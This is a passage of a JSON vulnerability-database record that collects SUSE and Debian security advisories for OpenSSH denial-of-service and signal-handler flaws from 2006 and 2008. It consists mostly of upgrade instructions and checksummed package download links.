security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:40:17", "bulletinFamily": "unix", "description": "Several security problems were fixed in OpenSSH 4.4 and the bug fixes were back ported to the openssh versions in our products.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2006-10-20T14:30:36", "published": "2006-10-20T14:30:36", "id": "SUSE-SA:2006:062", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-10/msg00011.html", "type": "suse", "title": "remote denial of service in openssh", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1212-1 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nNovember 15, 2006\n- ------------------------------------------------------------------------\n\nPackage : openssh (1:3.8.1p1-8.sarge.6)\nVulnerability : Denial of service\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2006-4924 CVE-2006-5051\nBugTraq ID : 20216 20241\nDebian Bug : 392428\n\nTwo denial of service vulnerabilities have been found in the OpenSSH\nserver.\n\nCVE-2006-4924\n\tThe sshd support for ssh protcol version 1 does not properly\n\thandle duplicate incoming blocks. This could allow a remote\n\tattacker to cause sshd to consume significant CPU resources\n\tleading to a denial of service.\n\nCVE-2006-5051\n\tA signal handler race condition could potentially allow a remote\n\tattacker to crash sshd and could theoretically lead to the\n\tability to execute arbitrary code.\n\nFor the stable distribution (sarge), these problems have been fixed in\nversion 1:3.8.1p1-8.sarge.6\n\nFor the unstable and testing distributions, these problems have been\nfixed in version 1:4.3p2-4\n\nWe recommend that you upgrade your openssh package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian 3.1 (stable)\n- -------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh_3.8.1p1-8.sarge.6.dsc\n Size/MD5 checksum: 842 b58f3585c4ce713f58096cc8f86e4550\n http://security.debian.org/pool/updates/main/o/openssh/openssh_3.8.1p1.orig.tar.gz\n Size/MD5 checksum: 795948 9ce6f2fa5b2931ce2c4c25f3af9ad50d\n http://security.debian.org/pool/updates/main/o/openssh/openssh_3.8.1p1-8.sarge.6.diff.gz\n Size/MD5 checksum: 157942 413fea91d9074513db60e466ca053f0d\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_alpha.udeb\n Size/MD5 checksum: 216100 0595066001c0004f181b58e781153ae2\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_alpha.deb\n Size/MD5 checksum: 52112 dcca41fba77489a57bf5a7e9c9069e90\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_alpha.deb\n Size/MD5 checksum: 886462 71f73c733794ea68f8c8c6e05ca2e8d3\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_alpha.udeb\n Size/MD5 checksum: 195114 32b3d7e2b11a5ae016ea19d44380f0d1\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_amd64.udeb\n Size/MD5 checksum: 159608 2d8c050003def7b7a2c8832333f90cf0\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_amd64.deb\n Size/MD5 checksum: 51688 ca60feebdef5f772ab0d42b6fd2c61f0\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_amd64.deb\n Size/MD5 checksum: 748382 59cebd0c9413b12894b88f9688216847\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_amd64.udeb\n Size/MD5 checksum: 176252 d886a611e7b150786b6e3ccdac303018\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_arm.deb\n Size/MD5 checksum: 673038 a58f22f69602835be4ebe87493d6f006\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_arm.udeb\n Size/MD5 checksum: 153938 5c668e80ea8429d686f9f9999b1e450d\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_arm.deb\n Size/MD5 checksum: 51028 3fc55eba3c4ec515fb70220b5f64a8d3\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_arm.udeb\n Size/MD5 checksum: 144324 f8ca3e9ae3592445e1b18cc84f111f30\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_hppa.udeb\n Size/MD5 checksum: 166640 ef7a980dfd7fbb3319d7be72a34783cd\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_hppa.deb\n Size/MD5 checksum: 51764 5e5dfa87acf51e46224f54b3caf39814\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_hppa.udeb\n Size/MD5 checksum: 176152 480fd653a01de9ec47801b20e28c180a\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_hppa.deb\n Size/MD5 checksum: 759876 aaced6680806080745d7e7b1b7e16105\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_i386.udeb\n Size/MD5 checksum: 133076 3e8728a64af00a02dd940350512eb5d9\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_i386.deb\n Size/MD5 checksum: 688728 15e34bcd846e85fac769f3ac3c90e14b\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_i386.deb\n Size/MD5 checksum: 51336 b0c953a6b2a8d04fd3a384bd987be243\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_i386.udeb\n Size/MD5 checksum: 146126 d0c4ab7aa9735fa5bd6b5e088cd38fe0\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_ia64.udeb\n Size/MD5 checksum: 245060 943b8ef2aa2efebadb1382a17ec73385\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_ia64.deb\n Size/MD5 checksum: 52794 d5152cba549f21aea88e1e4f7e1156f9\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_ia64.udeb\n Size/MD5 checksum: 223128 c1343bc83aa62b8d4d0669990c890e9a\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_ia64.deb\n Size/MD5 checksum: 978348 4df605171fec285cf0d63121dcbdc226\n\nm68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_m68k.udeb\n Size/MD5 checksum: 140424 703a06479b9b06d08fdccb08c3c5a0c6\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_m68k.udeb\n Size/MD5 checksum: 126882 d4a4960f8a81e0325e7e51d9de30ccb2\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_m68k.deb\n Size/MD5 checksum: 634538 db5bd8d18c409fdd0d32645229cf2b9c\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_m68k.deb\n Size/MD5 checksum: 51254 8b350a4b23bfb3791cba5b48fe5ecd5d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_mips.udeb\n Size/MD5 checksum: 180468 e5e51b59cb930e454c30464e386354a4\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_mips.deb\n Size/MD5 checksum: 51652 dc40a74947d6e20dc1069818b0b509e6\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_mips.udeb\n Size/MD5 checksum: 168434 5c60cab56f8114141c2b66ff11fdb27b\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_mips.deb\n Size/MD5 checksum: 771620 bbfea051bebdda48d80e2e85e54e59fa\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_mipsel.deb\n Size/MD5 checksum: 51598 f1d94e4df1c066c47b1e8b0da68d1af1\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_mipsel.udeb\n Size/MD5 checksum: 168904 2812bd93c1a73475a2f5da2360c6ae84\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_mipsel.udeb\n Size/MD5 checksum: 180466 34e765b1bb88443887ab351ca1aed6b5\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_mipsel.deb\n Size/MD5 checksum: 773824 b999638c312e9d05bd70550afc44e215\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_powerpc.udeb\n Size/MD5 checksum: 160160 079367a6f51d6b971bb89569098401e3\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_powerpc.deb\n Size/MD5 checksum: 52792 232893927edddfe9e90dddf37e746c12\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_powerpc.deb\n Size/MD5 checksum: 738392 1b3480543efd3f9314f7a00279b8b995\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_powerpc.udeb\n Size/MD5 checksum: 151108 6852aaf3e53763b502d7217ad50d44b3\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_s390.deb\n Size/MD5 checksum: 51848 477de6fc5a16e8e9c8a6ee37900a0662\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_s390.udeb\n Size/MD5 checksum: 163144 ea1c37908db44852a6a8a3c6e9b46d5e\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_s390.deb\n Size/MD5 checksum: 751564 bce6de0298a3e0e644e7732c1e38b92e\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_s390.udeb\n Size/MD5 checksum: 174552 31116868d2522f627ad4e03e7a5f83ea\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh_3.8.1p1-8.sarge.6_sparc.deb\n Size/MD5 checksum: 678210 eb8315ac61f84552e5d0960974d8b6b8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_3.8.1p1-8.sarge.6_sparc.udeb\n Size/MD5 checksum: 153190 60ad4beeaa93a360212614fee9059e44\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.8.1p1-8.sarge.6_sparc.deb\n Size/MD5 checksum: 51102 b7e318e55dd39c2c5a7b47cdea057005\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_3.8.1p1-8.sarge.6_sparc.udeb\n Size/MD5 checksum: 142084 b84f6dd4d0209df91c1f436e80526aea\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2006-11-15T00:00:00", "published": "2006-11-15T00:00:00", "id": "DEBIAN:DSA-1212-1:2D867", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00309.html", "title": "[SECURITY] [DSA 1212-1] New openssh packages fix denial of service", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:27", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1189-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 4th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : openssh-krb5\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-4924 CVE-2006-5051\n\nSeveral remote vulnerabilities have been discovered in OpenSSH, a free\nimplementation of the Secure Shell protocol, which may lead to denial of\nservice and potentially the execution of arbitrary code. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2006-4924\n\n Tavis Ormandy of the Google Security Team discovered a denial of\n service vulnerability in the mitigation code against complexity\n attacks, which might lead to increased CPU consumption until a\n timeout is triggered. This is only exploitable if support for \n SSH protocol version 1 is enabled.\n\nCVE-2006-5051\n\n Mark Dowd discovered that insecure signal handler usage could\n potentially lead to execution of arbitrary code through a double\n free. The Debian Security Team doesn't believe the general openssh\n package without Kerberos support to be exploitable by this issue.\n However, due to the complexity of the underlying code we will\n issue an update to rule out all eventualities.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 3.8.1p1-7sarge1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.3p2-4 of openssh. openssh-krb5 will soon be converted towards\na transitional package against openssh.\n\nWe recommend that you upgrade your openssh-krb5 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/openssh-krb5_3.8.1p1-7sarge1.dsc\n Size/MD5 checksum: 693 d0a8ac5b868c5f84fd372c9ef597f3a6\n http://security.debian.org/pool/updates/main/o/openssh-krb5/openssh-krb5_3.8.1p1-7sarge1.diff.gz\n Size/MD5 checksum: 167076 1fcdbc92c7a0992711b2dc67b9923ba7\n http://security.debian.org/pool/updates/main/o/openssh-krb5/openssh-krb5_3.8.1p1.orig.tar.gz\n Size/MD5 checksum: 795948 9ce6f2fa5b2931ce2c4c25f3af9ad50d\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_alpha.deb\n Size/MD5 checksum: 909896 44611f5a619acf0bccdeb366d76f39c5\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_amd64.deb\n Size/MD5 checksum: 773658 dc8335560cead18af3fa4eb52911af92\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_arm.deb\n Size/MD5 checksum: 689752 18e79d4e27c0ec313147e0951ef6082a\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_hppa.deb\n Size/MD5 checksum: 780142 5e692daa057c38f1fa1f0f877824e991\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_i386.deb\n Size/MD5 checksum: 706910 a4eda3cc320f77d2dc1065976086c31f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_ia64.deb\n Size/MD5 checksum: 1004916 91f89e80f1a27f942bd5fe9e7ae2ba3e\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_m68k.deb\n Size/MD5 checksum: 651232 8f41b159434ef7bf3187cd4954e816cc\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_mips.deb\n Size/MD5 checksum: 790716 cbc586aa73bcf295cd61f1c09e8015d8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_mipsel.deb\n Size/MD5 checksum: 793644 3364603438fceb21bffdd3efb4887e0e\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_powerpc.deb\n Size/MD5 checksum: 757954 ddb9cbba0e84f84da8e60fcbcbaddbae\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_s390.deb\n Size/MD5 checksum: 771520 2148d40fa59dc98b94ac6a03ed2c444f\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/o/openssh-krb5/ssh-krb5_3.8.1p1-7sarge1_sparc.deb\n Size/MD5 checksum: 694800 9c059e2e4ba232774a522da0a2757f06\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2006-10-04T00:00:00", "published": "2006-10-04T00:00:00", "id": "DEBIAN:DSA-1189-1:26174", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00284.html", "title": "[SECURITY] [DSA 1189-1] New openssh-krb5 packages fix denial of service and potential execution of arbitrary code", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-22T02:26:51", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1638-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nSeptember 16, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : openssh\nVulnerability : remote\nProblem type : unsafe signal handler\nDebian-specific: no\nCVE Id(s) : CVE-2008-4109\nDebian Bug : 498678\n\nIt has been discovered that the signal handler implementing the login\ntimeout in Debian's version of the OpenSSH server uses functions which\nare not async-signal-safe, leading to a denial of service\nvulnerability (CVE-2008-4109).\n\nThe problem was originally corrected in OpenSSH 4.4p1 (CVE-2006-5051),\nbut the patch backported to the version released with etch was\nincorrect.\n\nSystems affected by this issue suffer from lots of zombie sshd\nprocesses. Processes stuck with a "[net]" process title have also been\nobserved. Over time, a sufficient number of processes may accumulate\nsuch that further login attempts are impossible. Presence of these\nprocesses does not indicate active exploitation of this vulnerability.\nIt is possible to trigger this denial of service condition by accident.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.3p2-9etch3.\n\nFor the unstable distribution (sid) and the testing distribution\n(lenny), this problem has been fixed in version 4.6p1-1.\n\nWe recommend that you upgrade your openssh packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch3.diff.gz\n Size/MD5 checksum: 275859 d36cb34826bb92eca24a9397369baee6\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2.orig.tar.gz\n Size/MD5 checksum: 920186 239fc801443acaffd4c1f111948ee69c\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch3.dsc\n Size/MD5 checksum: 1310 1888a56e6050c8b8c2caf95e9da1db84\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-krb5_4.3p2-9etch3_all.deb\n Size/MD5 checksum: 91378 2748b67458de398e05e7c05227a0c612\n http://security.debian.org/pool/updates/main/o/openssh/ssh_4.3p2-9etch3_all.deb\n Size/MD5 checksum: 1052 f47a80d017cd3184bc981a38ced31ee8\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_alpha.deb\n Size/MD5 checksum: 782932 e7f3b896603dc1aebadb370d79ab90f5\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_alpha.deb\n Size/MD5 checksum: 100580 8ed4b61e252f3080073134abae2a36cd\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_alpha.udeb\n Size/MD5 checksum: 213712 9eb6b65f9292db607a4b2d6bf498c54f\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_alpha.deb\n Size/MD5 checksum: 266512 81805fcb11c56d7252ecdf4a1e74d713\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_alpha.udeb\n Size/MD5 checksum: 198516 d294a1db5f4257c4c58154bb160232f1\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_amd64.deb\n Size/MD5 checksum: 710490 816deaa292a89d07a1d8b6ad196eb72d\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_amd64.deb\n Size/MD5 checksum: 99976 05a863e6cd0aaced1cf8c774d7573274\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_amd64.udeb\n Size/MD5 checksum: 183846 a9c89a870bb58463606ec8b736643144\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_amd64.deb\n Size/MD5 checksum: 244368 9d0b3126c34e338b4f5216284518aea8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_amd64.udeb\n Size/MD5 checksum: 171380 2cf03617de7bd22ff03b85f8ca2b25f0\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_arm.deb\n Size/MD5 checksum: 650726 a50736277f77d29a8cd59be5de31efe8\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_arm.deb\n Size/MD5 checksum: 99754 bee5a81d4168699a324ff572d6e436d6\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_arm.udeb\n Size/MD5 checksum: 164866 067f69be0283f3bb3cf697f4312d2bbb\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_arm.deb\n Size/MD5 checksum: 218966 2a8dfbfc4e5abe2d333f20e123ad38ad\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_arm.udeb\n Size/MD5 checksum: 171672 a0ce63abaee1e7cfbaf64e62dc8164b5\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_hppa.deb\n Size/MD5 checksum: 732946 3177a89f68634880a3da10e054abe538\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_hppa.udeb\n Size/MD5 checksum: 189606 92ce0ac13874e3ec7ef20e7d97221850\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_hppa.deb\n Size/MD5 checksum: 249864 191165420d41b4ea84f7ae820a61dee1\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_hppa.udeb\n Size/MD5 checksum: 198138 af0b7c29c951135595170b63251dd484\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_hppa.deb\n Size/MD5 checksum: 100532 55db615aae32e2adf40dbe79b5fc7cf1\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_i386.deb\n Size/MD5 checksum: 99766 5844bc9b9aebd6da32ceba7b80017dea\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_i386.udeb\n Size/MD5 checksum: 162626 b8ce1b90a26b1097ddfc5fb8323dc1d3\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_i386.deb\n Size/MD5 checksum: 223696 087b8d33303c197953ba2a9904345592\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_i386.udeb\n Size/MD5 checksum: 154038 308a4f0d415532bfa7b3836d70aaf4ea\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_i386.deb\n Size/MD5 checksum: 659992 df6bf6ae7a34e91d5677115bbdb01b73\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_ia64.deb\n Size/MD5 checksum: 962182 49dc85d747e2a50d8e37b9c4e7428e6e\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_ia64.udeb\n Size/MD5 checksum: 269904 bf013bd6ab07afab765d6ca84be21666\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_ia64.deb\n Size/MD5 checksum: 338240 3fe40ae711c9c0c3689f5d8c50b70af7\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_ia64.deb\n Size/MD5 checksum: 101440 c49ecbbdd0101c8a90fcc9d4b60ae1c8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_ia64.udeb\n Size/MD5 checksum: 251934 793c1d31b7a179a766ed57d6ad5649cf\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_mips.deb\n Size/MD5 checksum: 732114 9ec13c1de7481000339c6f10ebb7f149\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_mips.udeb\n Size/MD5 checksum: 191298 d190ada9fd3c0420d949126c02fa85da\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_mips.deb\n Size/MD5 checksum: 251044 c97d6f7d9baf2b1678289e9e067ea4d4\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_mips.udeb\n Size/MD5 checksum: 200554 028987ca5310b3fb2e6003ba385b2bd0\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_mips.deb\n Size/MD5 checksum: 99996 f52e7996ddb5f7bff8d6ced65f82bd2d\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_powerpc.udeb\n Size/MD5 checksum: 168340 030a27c9ce4287f28669ba4a5af8247c\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_powerpc.deb\n Size/MD5 checksum: 237020 3cde6fe4ab569ca83cc9616572be11ca\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_powerpc.udeb\n Size/MD5 checksum: 173280 38bdde6d16b07399ba996dd66a6311ae\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_powerpc.deb\n Size/MD5 checksum: 700832 6397ec69df1deb0c5e0bc4c58ffae141\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_powerpc.deb\n Size/MD5 checksum: 101248 bfcd1a41ede062d9449f5be7eb7cd16f\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_s390.deb\n Size/MD5 checksum: 246734 9181c374dcb69441bd7ec030aadfb911\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_s390.udeb\n Size/MD5 checksum: 188516 a3786ab0a693ddb4f81fdeeead01ec51\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_s390.deb\n Size/MD5 checksum: 100226 73ec19e480b2e9b4c2809a04a77d27b9\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_s390.deb\n Size/MD5 checksum: 725828 7ff9eafecb36d2147305e08289ca22a4\n 